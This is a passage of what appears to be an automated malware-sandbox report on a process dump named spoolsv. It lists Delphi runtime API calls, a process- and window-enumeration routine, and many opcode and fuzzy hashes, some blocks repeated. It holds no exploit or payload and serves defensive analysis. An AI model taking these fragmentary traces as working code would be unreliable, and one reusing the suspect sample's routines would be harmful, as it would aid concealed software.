                                                • GetThreadLocale.KERNEL32(00000000,0042FB77,?,?,00000000,00000000), ref: 0042F8E2
                                                  • Part of subcall function 0042DF2C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Locale$InfoThread
                                                • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                • API String ID: 4232894706-2493093252
                                                • Opcode ID: 79201f3f7c0f6db5aab56cbcec8dbd302e1c5a467d6b75af3be145713cf87dc5
                                                • Instruction ID: 197d17d46539fea116ba07fa9f83ce9cdf8d1f815eb4acb174e747f36b05566f
                                                • Opcode Fuzzy Hash: 79201f3f7c0f6db5aab56cbcec8dbd302e1c5a467d6b75af3be145713cf87dc5
                                                • Instruction Fuzzy Hash: B1617F30B001289BDB00EBB9FD516DE7AB6AB88304FD1907BB101DB346DA3DD949975D
                                                APIs
                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004321ED
                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00432209
                                                • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00432242
                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004322CE
                                                • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004322ED
                                                • VariantCopy.OLEAUT32(?), ref: 00432322
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                • String ID:
                                                • API String ID: 351091851-3916222277
                                                • Opcode ID: 287d018db1ed06f337db09492564644d5890f8cdaa2b2e6e0ed5f9d3aff5ee10
                                                • Instruction ID: 5b189e654ec2a164cf08ff3fe1fa5bda42d96994a9381aa440632436457c8679
                                                • Opcode Fuzzy Hash: 287d018db1ed06f337db09492564644d5890f8cdaa2b2e6e0ed5f9d3aff5ee10
                                                • Instruction Fuzzy Hash: 62510F75A0021D9BCB22DB59CD81BDAB3FCAF4C304F0051DAE609E7211D678AF858F68
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E,?,?,?,?,00000002,004253FA,00423BB3,00423BFB), ref: 004252BD
                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E,?,?,?,?,00000002,004253FA,00423BB3,00423BFB), ref: 004252C3
                                                • GetStdHandle.KERNEL32(000000F5,0042530C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E), ref: 004252D8
                                                • WriteFile.KERNEL32(00000000,000000F5,0042530C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E), ref: 004252DE
                                                • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004252FC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileHandleWrite$Message
                                                • String ID: Error$Runtime error at 00000000
                                                • API String ID: 1570097196-2970929446
                                                • Opcode ID: dcbf2f3d7b9242d4721900ac582d9b642c1af0b42a895dc0042be7d523733b8f
                                                • Instruction ID: bba3c48ee625c544525bb5478dd2fe844e83fda31baf9900a2c834fa5eb47d56
                                                • Opcode Fuzzy Hash: dcbf2f3d7b9242d4721900ac582d9b642c1af0b42a895dc0042be7d523733b8f
                                                • Instruction Fuzzy Hash: D6F0F660B80B20B5EA20B3A47E0AF9E2E585714B14F90538BB160940E2CAFE54C8D639
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E,?,?,?,?,00000002,004253FA,00423BB3,00423BFB), ref: 004252BD
                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E,?,?,?,?,00000002,004253FA,00423BB3,00423BFB), ref: 004252C3
                                                • GetStdHandle.KERNEL32(000000F5,0042530C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E), ref: 004252D8
                                                • WriteFile.KERNEL32(00000000,000000F5,0042530C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E), ref: 004252DE
                                                • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004252FC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileHandleWrite$Message
                                                • String ID: Error$Runtime error at 00000000
                                                • API String ID: 1570097196-2970929446
                                                • Opcode ID: dcbf2f3d7b9242d4721900ac582d9b642c1af0b42a895dc0042be7d523733b8f
                                                • Instruction ID: bba3c48ee625c544525bb5478dd2fe844e83fda31baf9900a2c834fa5eb47d56
                                                • Opcode Fuzzy Hash: dcbf2f3d7b9242d4721900ac582d9b642c1af0b42a895dc0042be7d523733b8f
                                                • Instruction Fuzzy Hash: D6F0F660B80B20B5EA20B3A47E0AF9E2E585714B14F90538BB160940E2CAFE54C8D639
                                                APIs
                                                  • Part of subcall function 0042E498: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0042E4B4
                                                  • Part of subcall function 0042E498: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0042E4D8
                                                  • Part of subcall function 0042E498: GetModuleFileNameA.KERNEL32(500051C6), ref: 0042E4F3
                                                  • Part of subcall function 0042E498: LoadStringA.USER32(00000000,0000FFEA,?,00000100), ref: 0042E597
                                                • CharToOemA.USER32(?,?), ref: 0042E667
                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E684
                                                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E68A
                                                • GetStdHandle.KERNEL32(000000F4,0042E6F4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E69F
                                                • WriteFile.KERNEL32(00000000,000000F4,0042E6F4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E6A5
                                                • LoadStringA.USER32(00000000,0000FFEB,?,00000040), ref: 0042E6C7
                                                • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0042E6DD
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                • String ID:
                                                • API String ID: 185507032-0
                                                • Opcode ID: 401045d8ee95fbdf89e19f6e1ec223ffdeb1ebc428783b2908f96f474aea0da3
                                                • Instruction ID: f84d6c0ac8f674a6599e0b2749f10f63cfea0163ede0fee5985a43e8fc28d286
                                                • Opcode Fuzzy Hash: 401045d8ee95fbdf89e19f6e1ec223ffdeb1ebc428783b2908f96f474aea0da3
                                                • Instruction Fuzzy Hash: 59114FB1205324AAD200EB65EC46F9F77ACAB54704FC0491FB754D60E2DE78D944C76A
                                                APIs
                                                  • Part of subcall function 0042E498: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0042E4B4
                                                  • Part of subcall function 0042E498: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0042E4D8
                                                  • Part of subcall function 0042E498: GetModuleFileNameA.KERNEL32(500051C6), ref: 0042E4F3
                                                  • Part of subcall function 0042E498: LoadStringA.USER32(00000000,0000FFEA,?,00000100), ref: 0042E597
                                                • CharToOemA.USER32(?,?), ref: 0042E667
                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E684
                                                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E68A
                                                • GetStdHandle.KERNEL32(000000F4,0042E6F4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E69F
                                                • WriteFile.KERNEL32(00000000,000000F4,0042E6F4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E6A5
                                                • LoadStringA.USER32(00000000,0000FFEB,?,00000040), ref: 0042E6C7
                                                • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0042E6DD
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                • String ID:
                                                • API String ID: 185507032-0
                                                • Opcode ID: baea71bdd7c72920dabe1177effcbf5504b31f12a8aae7cd7971186c44ea1b49
                                                • Instruction ID: f84d6c0ac8f674a6599e0b2749f10f63cfea0163ede0fee5985a43e8fc28d286
                                                • Opcode Fuzzy Hash: baea71bdd7c72920dabe1177effcbf5504b31f12a8aae7cd7971186c44ea1b49
                                                • Instruction Fuzzy Hash: 59114FB1205324AAD200EB65EC46F9F77ACAB54704FC0491FB754D60E2DE78D944C76A
                                                APIs
                                                • RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00422CD7
                                                • LocalFree.KERNEL32(008CCC50,00000000,00422D9C), ref: 00422CE9
                                                • VirtualFree.KERNEL32(?,00000000,00008000,008CCC50,00000000,00422D9C), ref: 00422D0D
                                                • LocalFree.KERNEL32(00000000,008CCC50,00000000,00422D9C), ref: 00422D5E
                                                • RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 00422D8C
                                                • RtlDeleteCriticalSection.NTDLL(0051C5CC), ref: 00422D96
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                • String ID:
                                                • API String ID: 3782394904-0
                                                • Opcode ID: 520aaeab858216aa6be7b821c17dc9bd15337d80360f4e9e100d51cd42fe918b
                                                • Instruction ID: 51b20bc82c46605137a71ee0876b208d9b0e80c496a26de6aac0e9cff921d01f
                                                • Opcode Fuzzy Hash: 520aaeab858216aa6be7b821c17dc9bd15337d80360f4e9e100d51cd42fe918b
                                                • Instruction Fuzzy Hash: D8218170781610BFD710EBA8EA45B997FE4E719304F914497F400D73A1C6BDB984EB19
                                                APIs
                                                • RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00422CD7
                                                • LocalFree.KERNEL32(008CCC50,00000000,00422D9C), ref: 00422CE9
                                                • VirtualFree.KERNEL32(?,00000000,00008000,008CCC50,00000000,00422D9C), ref: 00422D0D
                                                • LocalFree.KERNEL32(00000000,008CCC50,00000000,00422D9C), ref: 00422D5E
                                                • RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 00422D8C
                                                • RtlDeleteCriticalSection.NTDLL(0051C5CC), ref: 00422D96
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                • String ID:
                                                • API String ID: 3782394904-0
                                                • Opcode ID: 520aaeab858216aa6be7b821c17dc9bd15337d80360f4e9e100d51cd42fe918b
                                                • Instruction ID: 51b20bc82c46605137a71ee0876b208d9b0e80c496a26de6aac0e9cff921d01f
                                                • Opcode Fuzzy Hash: 520aaeab858216aa6be7b821c17dc9bd15337d80360f4e9e100d51cd42fe918b
                                                • Instruction Fuzzy Hash: D8218170781610BFD710EBA8EA45B997FE4E719304F914497F400D73A1C6BDB984EB19
                                                APIs
                                                  • Part of subcall function 004243D4: GetKeyboardType.USER32(00000000), ref: 004243D9
                                                  • Part of subcall function 004243D4: GetKeyboardType.USER32(00000001), ref: 004243E5
                                                • GetCommandLineA.KERNEL32 ref: 004279E7
                                                • GetVersion.KERNEL32 ref: 004279FB
                                                • GetVersion.KERNEL32 ref: 00427A0C
                                                • GetCurrentThreadId.KERNEL32 ref: 00427A48
                                                  • Part of subcall function 00424404: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424426
                                                  • Part of subcall function 00424404: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424459
                                                  • Part of subcall function 00424404: RegCloseKey.ADVAPI32(?,0042447C,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0042446F
                                                • GetThreadLocale.KERNEL32 ref: 00427A28
                                                  • Part of subcall function 004278B8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0042791E), ref: 004278DE
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                • String ID:
                                                • API String ID: 3734044017-0
                                                • Opcode ID: 26c5f3c9ca2902f351c218a0efba43a9c17a4940e5446c2a9e3ce4aa00990253
                                                • Instruction ID: d1f10ed7233c6c26cc9ab7a9211c78b7d6b8eafa5dd651b04747b7567f40d78a
                                                • Opcode Fuzzy Hash: 26c5f3c9ca2902f351c218a0efba43a9c17a4940e5446c2a9e3ce4aa00990253
                                                • Instruction Fuzzy Hash: 130156B0684261D9E714FBB1B90A38D3E50BB25308FC1955F944086262E7BE014CEB7E
                                                APIs
                                                  • Part of subcall function 004243D4: GetKeyboardType.USER32(00000000), ref: 004243D9
                                                  • Part of subcall function 004243D4: GetKeyboardType.USER32(00000001), ref: 004243E5
                                                • GetCommandLineA.KERNEL32 ref: 004279E7
                                                • GetVersion.KERNEL32 ref: 004279FB
                                                • GetVersion.KERNEL32 ref: 00427A0C
                                                • GetCurrentThreadId.KERNEL32 ref: 00427A48
                                                  • Part of subcall function 00424404: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424426
                                                  • Part of subcall function 00424404: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424459
                                                  • Part of subcall function 00424404: RegCloseKey.ADVAPI32(?,0042447C,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0042446F
                                                • GetThreadLocale.KERNEL32 ref: 00427A28
                                                  • Part of subcall function 004278B8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0042791E), ref: 004278DE
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                • String ID:
                                                • API String ID: 3734044017-0
                                                • Opcode ID: 26c5f3c9ca2902f351c218a0efba43a9c17a4940e5446c2a9e3ce4aa00990253
                                                • Instruction ID: d1f10ed7233c6c26cc9ab7a9211c78b7d6b8eafa5dd651b04747b7567f40d78a
                                                • Opcode Fuzzy Hash: 26c5f3c9ca2902f351c218a0efba43a9c17a4940e5446c2a9e3ce4aa00990253
                                                • Instruction Fuzzy Hash: 130156B0684261D9E714FBB1B90A38D3E50BB25308FC1955F944086262E7BE014CEB7E
                                                APIs
                                                • FindWindowW.USER32(00000000,?), ref: 004E75A6
                                                  • Part of subcall function 004CF5C8: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF5D9
                                                • CloseHandle.KERNEL32(00000000), ref: 004E7557
                                                  • Part of subcall function 004CF648: Process32NextW.KERNEL32(00000000,?), ref: 004CF659
                                                • EnumWindows.USER32(004E7268,?), ref: 004E76D1
                                                  • Part of subcall function 004CF628: Process32FirstW.KERNEL32(00000000,0000022C), ref: 004CF639
                                                • CloseHandle.KERNEL32(00000000), ref: 004E76C3
                                                  • Part of subcall function 00425D80: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00425CC7
                                                  • Part of subcall function 00425D80: SysFreeString.OLEAUT32(?), ref: 00425CD9
                                                  • Part of subcall function 00425C04: SysReAllocStringLen.OLEAUT32(-00000008,"lB,?), ref: 00425C1A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: String$AllocCloseHandleProcess32$CreateEnumFindFirstFreeNextSnapshotToolhelp32WindowWindows
                                                • String ID: 4rN
                                                • API String ID: 2697489950-1347347389
                                                • Opcode ID: f194a714a7efd85bda473ecfc0a6603ba410595ee8a9a87fd8048d74f52a551e
                                                • Instruction ID: 81800b201d129eb233c86aa27584eaf6e594e3464967b80929217755b8ff651a
                                                • Opcode Fuzzy Hash: f194a714a7efd85bda473ecfc0a6603ba410595ee8a9a87fd8048d74f52a551e
                                                • Instruction Fuzzy Hash: 1AB1B6347042598BCB20FB26DC85ABE77B6AF44315F5045ABE80497355E73CEE458B88
                                                APIs
                                                • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00424C8A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID: (B$<"B$<B
                                                • API String ID: 3192549508-3130809168
                                                • Opcode ID: 61ea2ded6a3fe5bb661d9684595d8f3dcd9852728339d15bbff64cb3e4822364
                                                • Instruction ID: ba7fb83052fc80cd7703b70a966ced7e32abaed02e915777dc773f657e1679cb
                                                • Opcode Fuzzy Hash: 61ea2ded6a3fe5bb661d9684595d8f3dcd9852728339d15bbff64cb3e4822364
                                                • Instruction Fuzzy Hash: 9041A0707042219FD720DF19E884B2BBBE5EFC8354FA6855AE84887351C739EC45CB69
                                                APIs
                                                • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00424C8A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID: (B$<"B$<B
                                                • API String ID: 3192549508-3130809168
                                                • Opcode ID: 61ea2ded6a3fe5bb661d9684595d8f3dcd9852728339d15bbff64cb3e4822364
                                                • Instruction ID: ba7fb83052fc80cd7703b70a966ced7e32abaed02e915777dc773f657e1679cb
                                                • Opcode Fuzzy Hash: 61ea2ded6a3fe5bb661d9684595d8f3dcd9852728339d15bbff64cb3e4822364
                                                • Instruction Fuzzy Hash: 9041A0707042219FD720DF19E884B2BBBE5EFC8354FA6855AE84887351C739EC45CB69
                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424426
                                                • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424459
                                                • RegCloseKey.ADVAPI32(?,0042447C,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0042446F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                • API String ID: 3677997916-4173385793
                                                • Opcode ID: da2b4d77520dffc7498c5254fd507111a2b61757f3a216e35b9f8c8fb5b33fc9
                                                • Instruction ID: f32d36fbebf6c4c7954b05bf0a9ffb8b8aa37f3b827fee81d15b76f4adfa98af
                                                • Opcode Fuzzy Hash: da2b4d77520dffc7498c5254fd507111a2b61757f3a216e35b9f8c8fb5b33fc9
                                                • Instruction Fuzzy Hash: 0601D875B00318BAE711EBE0ED42FBD77FCEB48700F9000A6BA00D6580E6B96A15D76C
                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424426
                                                • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424459
                                                • RegCloseKey.ADVAPI32(?,0042447C,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0042446F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                • API String ID: 3677997916-4173385793
                                                • Opcode ID: da2b4d77520dffc7498c5254fd507111a2b61757f3a216e35b9f8c8fb5b33fc9
                                                • Instruction ID: f32d36fbebf6c4c7954b05bf0a9ffb8b8aa37f3b827fee81d15b76f4adfa98af
                                                • Opcode Fuzzy Hash: da2b4d77520dffc7498c5254fd507111a2b61757f3a216e35b9f8c8fb5b33fc9
                                                • Instruction Fuzzy Hash: 0601D875B00318BAE711EBE0ED42FBD77FCEB48700F9000A6BA00D6580E6B96A15D76C
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9fe27699cabda99f2469338a0172294736777644ee96d5e14d692abe27671e06
                                                • Instruction ID: 11a4c6921ebe278047dcd8f13468105319aefaf55964cb1d796cf0fb5e4db3cb
                                                • Opcode Fuzzy Hash: 9fe27699cabda99f2469338a0172294736777644ee96d5e14d692abe27671e06
                                                • Instruction Fuzzy Hash: 72D1C735B0010AEFCF10EF94C4919EDBBB5EF4D710F55A4AAE840A7311D638AE46CB69
                                                APIs
